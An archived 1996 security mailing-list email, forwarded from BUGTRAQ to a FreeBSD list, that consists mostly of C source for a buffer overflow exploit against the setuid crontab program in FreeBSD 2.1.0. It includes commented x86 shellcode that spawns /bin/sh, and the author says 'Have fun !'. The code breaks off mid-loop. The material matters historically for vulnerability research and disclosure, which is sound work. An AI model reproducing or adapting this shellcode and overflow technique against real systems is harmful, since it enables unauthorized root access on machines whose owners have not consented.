From owner-freebsd-security Mon Dec 16 03:47:23 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id DAA20725 for security-outgoing; Mon, 16 Dec 1996 03:47:23 -0800 (PST) Received: from whale.gu.kiev.ua (whale.gu.net [194.93.190.4]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id DAA20710 for ; Mon, 16 Dec 1996 03:47:04 -0800 (PST) Received: from creator.gu.kiev.ua (stesin@creator.gu.kiev.ua [194.93.190.3]) by whale.gu.kiev.ua (8.7.5/8.7.3) with ESMTP id NAA56002 for ; Mon, 16 Dec 1996 13:46:58 +0200 X-Received: from brimstone (brimstone.netspace.org [128.148.157.143]) by creator.gu.kiev.ua with ESMTP id BAA24287 for ; Sun, 15 Dec 1996 01:19:29 +0200 X-Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <33614-4514>; Sat, 14 Dec 1996 18:18:59 -0500 X-Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id SAA26868; Sat, 14 Dec 1996 18:06:11 -0500 X-Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 1868880 for BUGTRAQ@NETSPACE.ORG; Sat, 14 Dec 1996 17:57:08 -0500 X-Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id RAA26060 for ; Sat, 14 Dec 1996 17:56:27 -0500 Approved-By: ALEPH1@UNDERGROUND.ORG X-Received: from leshka.chuvashia.su (leshka.chuvashia.su [194.58.212.226]) by netspace.org (8.8.2/8.8.2) with ESMTP id RAA22400 for ; Sat, 14 Dec 1996 17:23:38 -0500 X-Received: (from leshka@localhost) by leshka.chuvashia.su (8.8.3/8.8.3) id BAA00961; Sun, 15 Dec 1996 01:24:02 +0300 (MSK) Approved-By: Leshka Zakharoff Message-ID: <199612142224.BAA00961@leshka.chuvashia.su> Date: Sun, 15 Dec 1996 01:24:02 +0300 Reply-To: Leshka Zakharoff From: Leshka Zakharoff Subject: Exploit for crontab bug (FreeBSD 2.1.0). X-To: best-of-security@suburbia.net To: Multiple recipients of list BUGTRAQ ReSent-Date: Mon, 16 Dec 1996 13:45:48 +0200 (EET) ReSent-From: Andrew Stesin ReSent-To: security@freebsd.org ReSent-Message-ID: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk /* ---------------------------- CUT HERE ----------------------------------- */ /* */ /* Hi ! */ /* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */ /* If you have any problems with it, drop me a letter. */ /* Have fun ! */ /* */ /* */ /* ---------------------- */ /* --------------------------------------------- */ /* ----------------- Dedicated to my beautiful lady ------------------ */ /* --------------------------------------------- */ /* ---------------------- */ /* */ /* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */ #include main() { #define length 353 int i,j; unsigned long start_addr; char *env[]={NULL}; char param_string[length]; char code_string[]= { "\xeb\x2a" /* jmp cont */ /* geteip: */ "\x5d" /* popl %ebp */ "\x55" /* pushl %ebp */ "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ "\xc3" /* ret */ /* 0xffffffe0(%ebp): */ "/bin/sh" /* 0xffffffe7(%ebp): */ "\x01" /* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ /* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ "\xe8\xcb\xff\xff\xff" /* call geteip */ "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ "\x55" /* pushl %ebp */ "\x55" /* pushl %ebp */ "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ "\x55" /* pushl %ebp */ "\xe8\xd4\xff\xff\xff" /* call execve */ }; for(i=0;i